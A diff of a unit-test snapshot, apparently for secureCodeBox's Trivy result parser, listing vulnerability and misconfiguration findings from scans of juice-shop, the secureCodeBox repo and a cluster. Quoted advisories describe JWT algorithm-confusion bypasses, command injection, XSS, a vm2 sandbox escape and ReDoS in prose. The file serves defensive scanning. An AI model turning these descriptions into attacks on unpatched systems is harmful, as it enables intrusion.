the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -32111,11 +32173,13 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2016-1000223", }, "category": "NPM Package Vulnerability", - "description": "Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. + "description": +"Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. In addition, there is the \`none\` algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the \`alg\` field is set to \`none\`. -*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*", +*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package jws to the fixed version: >=3.0.0 or remove the package from the image.", "name": "Forgeable Public/Private Tokens", @@ -33472,12 +33536,14 @@ In addition, there is the \`none\` algorithm to be concerned about. In versions "vulnerabilityId": "GHSA-5mrr-rgp6-x4gr", }, "category": "NPM Package Vulnerability", - "description": "All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. + "description": +"All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. ## Recommendation -No fix is currently available. Consider using an alternative package until a fix is made available.", +No fix is currently available. Consider using an alternative package until a fix is made available." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package marsdb to the fixed version: undefined or remove the package from the image.", "name": "Command Injection in marsdb", @@ -36792,7 +36858,8 @@ No fix is currently available. Consider using an alternative package until a fix "vulnerabilityId": "GHSA-v78c-4p63-2j6c", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact * if Alice uses \`grunt data\` (or \`grunt release\`) to prepare a custom-build, moment-timezone with the latest tzdata from IANA's website * and Mallory intercepts the request to IANA's unencrypted ftp server, Mallory can serve data which might exploit further stages of the moment-timezone tzdata pipeline, or potentially produce a tainted version of moment-timezone (practicality of such attacks is not proved) @@ -36802,7 +36869,8 @@ Problem has been patched in version 0.5.35, patch should be applicable with mino ### Workarounds Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt data:2014d\`, then run the rest of the release tasks by hand), or just apply the patch before issuing the grunt command. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Cleartext Transmission of Sensitive Information in moment-timezone", @@ -36837,7 +36905,8 @@ Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt "vulnerabilityId": "GHSA-56x4-j7p9-fcf9", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact All versions of moment-timezone from 0.1.0 contain build tasks vulnerable to command injection. @@ -36936,7 +37005,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec ### References * https://knowledge-base.secureflag.com/vulnerabilities/code_injection/os_command_injection_nodejs.html -* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/", +* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Command Injection in moment-timezone", @@ -38566,7 +38636,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec "vulnerabilityId": "NSWG-ECO-154", }, "category": "NPM Package Vulnerability", - "description": "Sanitize-html is a library for scrubbing html input of malicious values. + "description": +"Sanitize-html is a library for scrubbing html input of malicious values. Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios: @@ -38584,7 +38655,8 @@ var clean = sanitizeHtml(dirty, { console.log(clean); // !! -\`\`\`", +\`\`\`" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package sanitize-html to the fixed version: >=1.11.4 or remove the package from the image.", "name": "Cross Site Scripting", @@ -38646,10 +38718,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -38807,10 +38881,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -38968,10 +39044,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39129,10 +39207,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39290,10 +39370,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39451,10 +39533,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39612,10 +39696,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39773,10 +39859,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -39934,10 +40022,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -40095,10 +40185,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -40658,9 +40750,11 @@ console.log(clean); "vulnerabilityId": "CVE-2022-0355", }, "category": "NPM Package Vulnerability", - "description": "Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. + "description": +"Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package simple-get to the fixed version: 4.0.1, 3.1.1, 2.8.2 or remove the package from the image.", "name": "simple-get: exposure of sensitive information to an unauthorized actor", @@ -40735,8 +40829,10 @@ console.log(clean); "vulnerabilityId": "CVE-2024-38355", }, "category": "NPM Package Vulnerability", - "description": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. -", + "description": +"Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package socket.io to the fixed version: 2.5.1, 4.6.2 or remove the package from the image.", "name": "socket.io: Unhandled 'error' event", @@ -40878,9 +40974,11 @@ console.log(clean); "vulnerabilityId": "CVE-2023-32695", }, "category": "NPM Package Vulnerability", - "description": "socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. + "description": +"socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package socket.io-parser to the fixed version: 4.2.3, 3.4.3, 3.3.4 or remove the package from the image.", "name": "socket.io parser is a socket.io encoder and decoder written in JavaScr ...", @@ -41139,7 +41237,8 @@ console.log(clean); "vulnerabilityId": "GHSA-qrmm-w75w-3wpx", }, "category": "NPM Package Vulnerability", - "description": "SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. + "description": +"SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. However, this functionality may pose a risk for users who host their own SwaggerUI instances. In particular, including remote OpenAPI definitions opens a vector for phishing attacks by abusing the trusted names/domains of self-hosted instances. @@ -41189,7 +41288,8 @@ Through the exploration of this issue, it became apparent that users may not be ## Reflected XSS attack **Warning** in versions < 3.38.0, it is possible to combine the URL options (as mentioned above) with a vulnerability in DOMPurify (https://www.cvedetails.com/cve/CVE-2020-26870/) to create a reflected XSS vector. If your version of Swagger UI is older than 3.38.0, we suggest you upgrade or implement the workaround as mentioned above. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package swagger-ui-dist to the fixed version: 4.1.3 or remove the package from the image.", "name": "Server side request forgery in SwaggerUI", @@ -42190,11 +42290,13 @@ Through the exploration of this issue, it became apparent that users may not be "vulnerabilityId": "GHSA-xx4c-jj58-r7x6", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact Versions of \`validator\` prior to 13.7.0 are affected by an inefficient Regular Expression complexity when using the \`rtrim\` and \`trim\` sanitizers. ### Patches -The problem has been patched in validator 13.7.0", +The problem has been patched in validator 13.7.0" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package validator to the fixed version: 13.7.0 or remove the package from the image.", "name": "Inefficient Regular Expression Complexity in Validator.js", @@ -42587,8 +42689,10 @@ The problem has been patched in validator 13.7.0", "vulnerabilityId": "CVE-2023-29199", }, "category": "NPM Package Vulnerability", - "description": "There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass \`handleException()\` and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version \`3.9.16\` of \`vm2\`. -", + "description": +"There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass \`handleException()\` and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version \`3.9.16\` of \`vm2\`. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package vm2 to the fixed version: 3.9.16 or remove the package from the image.", "name": "vm2: Sandbox Escape", @@ -42999,9 +43103,11 @@ The problem has been patched in validator 13.7.0", "vulnerabilityId": "CVE-2023-26115", }, "category": "NPM Package Vulnerability", - "description": "All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. + "description": +"All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package word-wrap to the fixed version: 1.2.4 or remove the package from the image.", "name": "word-wrap: ReDoS", @@ -44314,11 +44420,13 @@ exports[`parses securecodebox:master result file into findings 1`] = ` "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -44675,11 +44783,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -45114,11 +45224,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -45475,11 +45587,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -46358,11 +46472,13 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P "vulnerabilityId": "CVE-2024-21534", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. + "description": +"Versions of the package jsonpath-plus before 10.0.7 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** -There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).", +There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-Plus/JSONPath/commit/6b2f1b4c234292c75912b790bf7e2d7339d4ccd3) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226)." +, "location": "scb://trivy/?ArtifactName=https://github.com/secureCodeBox/secureCodeBox", "mitigation": "Update the affected package jsonpath-plus to the fixed version: 10.0.0 or remove the package from the image.", "name": "jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization", @@ -46956,5707 +47072,5681 @@ There was an attempt to fix it in version [10.0.0](https://github.com/JSONPath-P ] `; -exports[`should parse a trivy-k8s scan result 1`] = ` +exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox itself 1`] = ` [ { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.10.7-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-36159", + "installedVersion": "2.10.5-r1", + "packageName": "apk-tools", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", + "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", + "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols. The FTP passive mode implementation allows an out-of-bounds read because strtol is used to parse the relevant numbers into address bytes. It does not check if the line ends prematurely. If it does, the for-loop condition checks for the '\\0' terminator one byte too late.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Finding in Dependency apk-tools (2.10.5-r1)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2021-36159", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/freebsd/freebsd-src/commits/main/lib/libfetch", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + 